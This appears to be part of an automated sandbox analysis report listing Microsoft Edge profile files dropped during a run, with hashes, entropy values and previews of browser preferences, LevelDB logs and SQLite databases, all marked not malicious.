                                                                                                                                                                                                                                                                        Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\8f766143-c5e4-4b9b-8716-2197df0cdb80.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (17811), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):17815
                                                                                                                                                                                                                                                                        Entropy (8bit):5.49625626991478
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:stBPGQSu4hsBoTfhxCtz3k4bGhQwF6WQlaTY8:szOXuXMfENbGSCOaTY8
                                                                                                                                                                                                                                                                        MD5:92CD982E07E8F4B8B35D4385FBA5FB84
                                                                                                                                                                                                                                                                        SHA1:BEA78EA89D976335D1D8436167E5A1461BDC43AD
                                                                                                                                                                                                                                                                        SHA-256:8D8B46882DA09CF855EE07FAAFCD5ECB9E0DADAD7A309588295C91C3FDD841CA
                                                                                                                                                                                                                                                                        SHA-512:470C32A95F7F2D51065648CAF0A8D27B62E78728720F2FEE9C331A9C6D36A1FE0ACA5F07E179FD8C3B429AE349D444ABF5ACC76113CBD168A3D3542BD0B5BD49
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379757632293900","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):33
                                                                                                                                                                                                                                                                        Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                        MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                        SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                        SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                        SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):309
                                                                                                                                                                                                                                                                        Entropy (8bit):5.241998986146134
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:cF+d9uM1923oH+Tcwtp3hBtB2KLlmF+Fpyq2P923oH+Tcwtp3hBWsIFUv:99uhYebp3dFLqv4Yebp3eFUv
                                                                                                                                                                                                                                                                        MD5:9D393F8CE83255CFC93B13EFB20F3A16
                                                                                                                                                                                                                                                                        SHA1:415B3B3BCAED02671A47BF49D32D2E1A0D0217B1
                                                                                                                                                                                                                                                                        SHA-256:5876006BB3D2ED4ACA2C7AD7F71B810BBCDA07507FC53BEBC4ABA0F31A622D34
                                                                                                                                                                                                                                                                        SHA-512:F638920A531551E393097EC2E474990D252C9C2A4FE26CB5480E682D3BD0E7A45086321BFA4B9B32711E557FBE4B4D9258B01ACBD241A8BB2E9E73A6126151FD
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:37.624 1e94 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/27-02:20:37.657 1e94 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):41
                                                                                                                                                                                                                                                                        Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                        Size (bytes):2163821
                                                                                                                                                                                                                                                                        Entropy (8bit):5.22285605423049
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24576:v+/PN8FHfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:v+/PN8tfx2mjF
                                                                                                                                                                                                                                                                        MD5:72266509DC29F28B47B71A76F7939AFF
                                                                                                                                                                                                                                                                        SHA1:4CA2B720CCDE6CBA3BB36D803901E1F9430FE2C3
                                                                                                                                                                                                                                                                        SHA-256:C8986BEEBA8D476CC54FF29D23629D90B0B5C870AC79D4F751A40AF12BC1E99F
                                                                                                                                                                                                                                                                        SHA-512:98886D7B6B72DE93419DB3117182ADAB960B5595674AA6C32871A28E208658BECD0EFC74573D160B0C35561E638700625E477D9C7FD9345FBB2420A2FD32535B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:...m.................DB_VERSION.1.l.i.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340900604462938.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):336
                                                                                                                                                                                                                                                                        Entropy (8bit):5.04094466199738
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:cF+73Vq2P923oH+Tcwt9Eh1tIFUt8PF+N+gZmw+PF+d0SIkwO923oH+Tcwt9Eh1H:bVv4Yeb9Eh16FUt8tg/+I0SI5LYeb9Er
                                                                                                                                                                                                                                                                        MD5:9A86327F167FF4E6E12F8ED9D7BC20D1
                                                                                                                                                                                                                                                                        SHA1:9A1A7C17495871E74638818673BEF9E1C7DD3BAB
                                                                                                                                                                                                                                                                        SHA-256:EEEEC866B667CE8054249B3DD89781968CF37267C0D15016D8086553C8F145B1
                                                                                                                                                                                                                                                                        SHA-512:5A399B2540B8CF0DE0BBEE710B1C5386AB49C0BF294B5FE34ECDBC07AC031E616527D54ED940A6CE34C74D5DF9320379CD8ED9FCCF8AF6331007C11144EDA170
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:37.322 12d0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/27-02:20:37.325 12d0 Recovering log #3.2024/12/27-02:20:37.342 12d0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):336
                                                                                                                                                                                                                                                                        Entropy (8bit):5.04094466199738
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:cF+73Vq2P923oH+Tcwt9Eh1tIFUt8PF+N+gZmw+PF+d0SIkwO923oH+Tcwt9Eh1H:bVv4Yeb9Eh16FUt8tg/+I0SI5LYeb9Er
                                                                                                                                                                                                                                                                        MD5:9A86327F167FF4E6E12F8ED9D7BC20D1
                                                                                                                                                                                                                                                                        SHA1:9A1A7C17495871E74638818673BEF9E1C7DD3BAB
                                                                                                                                                                                                                                                                        SHA-256:EEEEC866B667CE8054249B3DD89781968CF37267C0D15016D8086553C8F145B1
                                                                                                                                                                                                                                                                        SHA-512:5A399B2540B8CF0DE0BBEE710B1C5386AB49C0BF294B5FE34ECDBC07AC031E616527D54ED940A6CE34C74D5DF9320379CD8ED9FCCF8AF6331007C11144EDA170
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:37.322 12d0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/27-02:20:37.325 12d0 Recovering log #3.2024/12/27-02:20:37.342 12d0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                                                                                                                        Entropy (8bit):0.46325222331921867
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuzr:TouQq3qh7z3bY2LNW9WMcUvBu3
                                                                                                                                                                                                                                                                        MD5:AC3E8AAF332748BC093CDCA9F184F00D
                                                                                                                                                                                                                                                                        SHA1:824AA9C9839A4FFD178A1BC94068E73B299A77B5
                                                                                                                                                                                                                                                                        SHA-256:508B1522FCA25F28C4370EFF78DB4442578516614CD3FED8B892FB9D803AA6C4
                                                                                                                                                                                                                                                                        SHA-512:151EAD923FD3B360D71993518D821A2EA73AD83AA321EBEEA105DB1A81491C5052C4B387931881511D061F1106ABC754325BF44EDB885E0448109C1D4784A936
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):10240
                                                                                                                                                                                                                                                                        Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                        MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                        SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                        SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                        SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):348
                                                                                                                                                                                                                                                                        Entropy (8bit):5.204808210810959
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:cF+034q2P923oH+TcwtnG2tMsIFUt8PF+YxJZmw+PF+YxDkwO923oH+TcwtnG2tF:UIv4Yebn9GFUt8hb/+hx5LYebn95J
                                                                                                                                                                                                                                                                        MD5:4BE4CAB16258042E7AA27DAC24CAD0A2
                                                                                                                                                                                                                                                                        SHA1:232CA454BD02E0CDFA010EE57362621998F764C4
                                                                                                                                                                                                                                                                        SHA-256:2C5039852676DDA520BBB885D427F08AB312E4168EBB8A818489C28C14554571
                                                                                                                                                                                                                                                                        SHA-512:A384B3AF7F8793759185D44AE8624C79A6BE1A86B84D90773E3CCDC79D44CE80AF39DF47152641E614725DE10B66ADAB73E4D0A8DE9A6901C66BB7363040FBBF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:31.769 1540 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/27-02:20:31.891 1540 Recovering log #3.2024/12/27-02:20:31.891 1540 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):348
                                                                                                                                                                                                                                                                        Entropy (8bit):5.204808210810959
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:cF+034q2P923oH+TcwtnG2tMsIFUt8PF+YxJZmw+PF+YxDkwO923oH+TcwtnG2tF:UIv4Yebn9GFUt8hb/+hx5LYebn95J
                                                                                                                                                                                                                                                                        MD5:4BE4CAB16258042E7AA27DAC24CAD0A2
                                                                                                                                                                                                                                                                        SHA1:232CA454BD02E0CDFA010EE57362621998F764C4
                                                                                                                                                                                                                                                                        SHA-256:2C5039852676DDA520BBB885D427F08AB312E4168EBB8A818489C28C14554571
                                                                                                                                                                                                                                                                        SHA-512:A384B3AF7F8793759185D44AE8624C79A6BE1A86B84D90773E3CCDC79D44CE80AF39DF47152641E614725DE10B66ADAB73E4D0A8DE9A6901C66BB7363040FBBF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:31.769 1540 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/27-02:20:31.891 1540 Recovering log #3.2024/12/27-02:20:31.891 1540 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                                                        Entropy (8bit):0.6140812347265813
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:TLs9pRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7mWqz9MAqAN7z:TLapR+DDNzWjJ0npnyXKUO8+jJ9pymL
                                                                                                                                                                                                                                                                        MD5:E2AF323CD6D99D90E0BB3FBD2BE882DD
                                                                                                                                                                                                                                                                        SHA1:FAA50324C87F1DE8A35308739CB210487C77AF6F
                                                                                                                                                                                                                                                                        SHA-256:CAB840B522BA0696F0641A3D26A3B7192141706A799749A43CAE2271F1327AFA
                                                                                                                                                                                                                                                                        SHA-512:4099587F0B07AFB203593E9E19B2A684D55ABB84F029499A4117E6B2D76305C86E3BE68ECA9D486CC8446C19284E792C1FD00EE8448456FA83767BCA717819A3
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):375520
                                                                                                                                                                                                                                                                        Entropy (8bit):5.354100415564454
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:nA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:nFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                        MD5:7F552EE46E00F40B58AC3F267DC9EB5C
                                                                                                                                                                                                                                                                        SHA1:EF8D785A83B3957DA5EB84149BD4D868BC001CF9
                                                                                                                                                                                                                                                                        SHA-256:0E2BB1521D41FF6BC015BCE4FB3B80E1744D8202DC1F24BED3101531959E8B3E
                                                                                                                                                                                                                                                                        SHA-512:2E451829377BFEEEA987EE0038A8BB55BC41DBF960F82E33DA498E6C16AE634AB89A47ACE4D68901DBC113DCC11F12FFFCE3AB06F59B1E03D814587F807D00D0
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:...m.................DB_VERSION.1M.Z.q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13379757642071930..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
